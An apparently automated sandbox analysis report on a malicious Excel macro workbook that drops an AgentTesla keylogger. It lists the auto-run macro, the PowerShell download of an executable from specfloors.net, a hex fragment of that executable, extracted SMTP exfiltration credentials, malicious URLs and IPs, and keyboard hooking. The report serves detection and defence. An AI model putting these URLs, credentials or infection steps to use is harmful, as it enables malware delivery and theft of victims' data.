Analysis Report MV TRIADES.xlsm

AV Detection:

Antivirus detection for URL or domain

Source: http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-	Avira URL Cloud: Label: malware
Source: http://specfloors.net/dev/income	Avira URL Cloud: Label: malware
Source: http://specfloors.net/dev/income.exe	Avira URL Cloud: Label: malware
Source: http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.html	Avira URL Cloud: Label: malware
Source: http://specfloors.net/dev/income.exePE	Avira URL Cloud: Label: malware
Source: http://liverpoolsupporters9.com	Avira URL Cloud: Label: malware
Source: http://specfloors.net	Avira URL Cloud: Label: malware

Found malware configuration

Source: 6.2.tNDFx.exe.6a8f2b8.17.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "mail@jiratane.comOlaola123@smtp.jiratane.comroot@jiratane.com"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\tNDFx.exe

ReversingLabs: Detection: 27%

Multi AV Scanner detection for submitted file

Source: MV TRIADES.xlsm	Virustotal: Detection: 44%			Perma Link
Source: MV TRIADES.xlsm	ReversingLabs: Detection: 42%

Machine Learning detection for sample

Source: MV TRIADES.xlsm

Joe Sandbox ML: detected

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: C:\Users\user\AppData\Roaming\tNDFx.PDB source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
Source:	Binary string: (PinLC:\Windows\Microsoft.VisualBasic.pdb source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
Source:	Binary string: Npdbsic.pdb source: tNDFx.exe, 00000006.00000002.2134070733.0000000005694000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\tNDFx.exe-1006ic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdb source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
Source:	Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4tNDFx.PDB424491E3931}\Servererver32 source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
Source:	Binary string: bc.pdbCESSO source: tNDFx.exe, 00000006.00000002.2134070733.0000000005694000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\tNDFx.exeualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: tNDFx.exe, 00000006.00000002.2134184751.00000000058E8000.00000004.00000001.sdmp
Source:	Binary string: @micC:\Users\user\AppData\Roaming\tNDFx.PDB source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
Source:	Binary string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbx source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp
Source:	Binary string: :\Windows\mscorlib.pdbpdblib.pdbX source: tNDFx.exe, 00000006.00000002.2134101883.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: @nptnVisualBasic.pdb\ source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2109637901.0000000002AB0000.00000002.00000001.sdmp
Source:	Binary string: :\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp

Spreading:

Enumerates the file system

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini			Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\cmd.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: specfloors.net

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 107.180.99.252:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 107.180.99.252:80

Networking:

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 198.54.116.63:587

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 22 Mar 2021 14:36:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 22 Mar 2021 11:02:01 GMTETag: "1e1614-11068-5be1dfec2aa31"Accept-Ranges: bytesContent-Length: 69736Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9d 4e b7 9f 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 f2 00 00 00 08 00 00 00 00 00 00 4e 11 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 c4 f6 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 11 01 00 4b 00 00 00 00 20 01 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 fc 00 00 68 14 00 00 00 40 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 f1 00 00 00 20 00 00 00 f2 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 05 00 00 00 20 01 00 00 06 00 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 11 01 00 00 00 00 00 48 00 00 00 02 00 05 00 a4 73 00 00 5c 9d 00 00 03 00 00 00 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 22 02 28 08 00 00 0a 00 2a 52 02 28 08 00 00 0a 00 00 02 73 09 00 00 0a 7d 02 00 00 04 2a 36 00 28 7e 00 00 06 6f 25 00 00 0a 00 2a 3e 00 02 72 c6 4c 00 70 03 6f 30 00 00 0a 00 2a 22 02 28 31 00 00 0a 00 2a 56 73 81 00 00 06 28 32 00 00 0a 74 05 00 00 02 80 03 00 00 04 2a 7e 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a c6 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a ae 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a de 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a f6 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /dev/income.exe HTTP/1.1Host: specfloors.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dev/income.exe HTTP/1.1Host: specfloors.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolsupporters9.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 172.67.176.78 172.67.176.78
Source: Joe Sandbox View	IP Address: 198.54.116.63 198.54.116.63

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Uses SMTP (mail sending)

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 198.54.116.63:587

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\625B6235.jpg

Jump to behavior

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /dev/income.exe HTTP/1.1Host: specfloors.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dev/income.exe HTTP/1.1Host: specfloors.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpoolsupporters9.comConnection: Keep-Alive

Found strings which match to known social media urls

Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: specfloors.net

Urls found in memory or binary data

Source: tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: tNDFx.exe, 00000006.00000002.2129265159.0000000000B2A000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.dJ
Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: tNDFx.exe, 00000006.00000002.2129265159.0000000000B2A000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: tNDFx.exe, 00000006.00000003.2110396652.00000000056D1000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.6.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmp	String found in binary or memory: http://jEOkvI.com
Source: tNDFx.exe, 00000006.00000002.2129469657.0000000002291000.00000004.00000001.sdmp	String found in binary or memory: http://liverpoolsupporters9.com
Source: tNDFx.exe, 00000006.00000002.2129469657.0000000002291000.00000004.00000001.sdmp	String found in binary or memory: http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-
Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000004.00000002.2105102393.00000000024C0000.00000002.00000001.sdmp, tNDFx.exe, 00000006.00000002.2133629732.0000000005190000.00000002.00000001.sdmp, tNDFx.exe, 0000000B.00000002.2353416224.0000000005DC0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: tNDFx.exe, 00000006.00000002.2129469657.0000000002291000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: tNDFx.exe, 00000006.00000002.2134297073.0000000005E20000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: tNDFx.exe, 0000000B.00000002.2351747321.00000000022D6000.00000004.00000001.sdmp	String found in binary or memory: http://smtp.jiratane.com
Source: powershell.exe, 00000004.00000002.2113001292.000000000357D000.00000004.00000001.sdmp	String found in binary or memory: http://specfloors.net
Source: powershell.exe, 00000004.00000002.2113001292.000000000357D000.00000004.00000001.sdmp	String found in binary or memory: http://specfloors.net/dev/income
Source: powershell.exe, 00000004.00000002.2113001292.000000000357D000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2115696478.000000001B4A6000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2109712096.0000000002BD1000.00000004.00000001.sdmp	String found in binary or memory: http://specfloors.net/dev/income.exe
Source: powershell.exe, 00000004.00000002.2113001292.000000000357D000.00000004.00000001.sdmp	String found in binary or memory: http://specfloors.net/dev/income.exePE
Source: powershell.exe, 00000004.00000002.2105102393.00000000024C0000.00000002.00000001.sdmp, tNDFx.exe, 00000006.00000002.2133629732.0000000005190000.00000002.00000001.sdmp, tNDFx.exe, 0000000B.00000002.2353416224.0000000005DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000004.00000002.2103160491.000000000035E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000004.00000002.2103160491.000000000035E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: tNDFx.exe, 0000000B.00000002.2351624860.000000000221A000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%
Source: tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://i2-prod.live
Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
Source: tNDFx.exe, 0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmp	String found in binary or memory: https://oMAWpB8PlZYBRN.org
Source: tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000004.00000002.2113125628.0000000003681000.00000004.00000001.sdmp, tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmp, tNDFx.exe.4.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/all-about/steven-gerrard
Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
Source: tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
Source: tNDFx.exe, 00000006.00000002.2134883837.0000000006A8F000.00000004.00000001.sdmp, tNDFx.exe, 0000000B.00000002.2350984768.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Source: C:\Users\user\AppData\Roaming\tNDFx.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\tNDFx.exe

Jump to behavior

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Document image extraction number: 1	Screenshot OCR: Enable Editing" form the yellow bar and then dick "Enable Content"
Source: Document image extraction number: 1	Screenshot OCR: Enable Content"
Source: Document image extraction number: 3	Screenshot OCR: Enable Editing" form the yellow bar and then dick "Enable Content"
Source: Document image extraction number: 3	Screenshot OCR: Enable Content"

Document contains an embedded VBA macro which may execute processes

Source: MV TRIADES.xlsm

OLE, VBA macro line: retval = Shell(sssssss)

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\tNDFx.exe

Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 6_2_001E9FDC NtSetInformationThread,		6_2_001E9FDC
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 6_2_001EA7A0 NtSetInformationThread,		6_2_001EA7A0

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_00366230		11_2_00366230
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_00365618		11_2_00365618
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_003668B8		11_2_003668B8
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_00365960		11_2_00365960
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_0036BD60		11_2_0036BD60
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_003621CF		11_2_003621CF
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_0036C2A9		11_2_0036C2A9
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_00362389		11_2_00362389
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_00366768		11_2_00366768
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_007D0898		11_2_007D0898
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_007D0048		11_2_007D0048
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_00869098		11_2_00869098
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_0086D8A0		11_2_0086D8A0
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_00860048		11_2_00860048
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_0086B850		11_2_0086B850
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_008685C0		11_2_008685C0
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_00869BC8		11_2_00869BC8
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_0086F510		11_2_0086F510
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_00863328		11_2_00863328
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_00868210		11_2_00868210
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_00863A50		11_2_00863A50
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_00866D98		11_2_00866D98
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_00865B10		11_2_00865B10
Source: C:\Users\user\AppData\Roaming\tNDFx.exe	Code function: 11_2_00869B28		11_2_00869B28

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: MV TRIADES.xlsm	OLE, VBA macro line: Public Sub Workbook_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open			Name: Workbook_Open

Document contains embedded VBA macros

Source: MV TRIADES.xlsm

OLE indicator, VBA macros: true

Binary contains paths to development resources

Source: tNDFx.exe, 00000006.00000002.2128957283.0000000000408000.00000004.00000010.sdmp	Binary or memory string: C:\Users\user\AppData\Roaming\tNDFx.exe-1006ic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdb
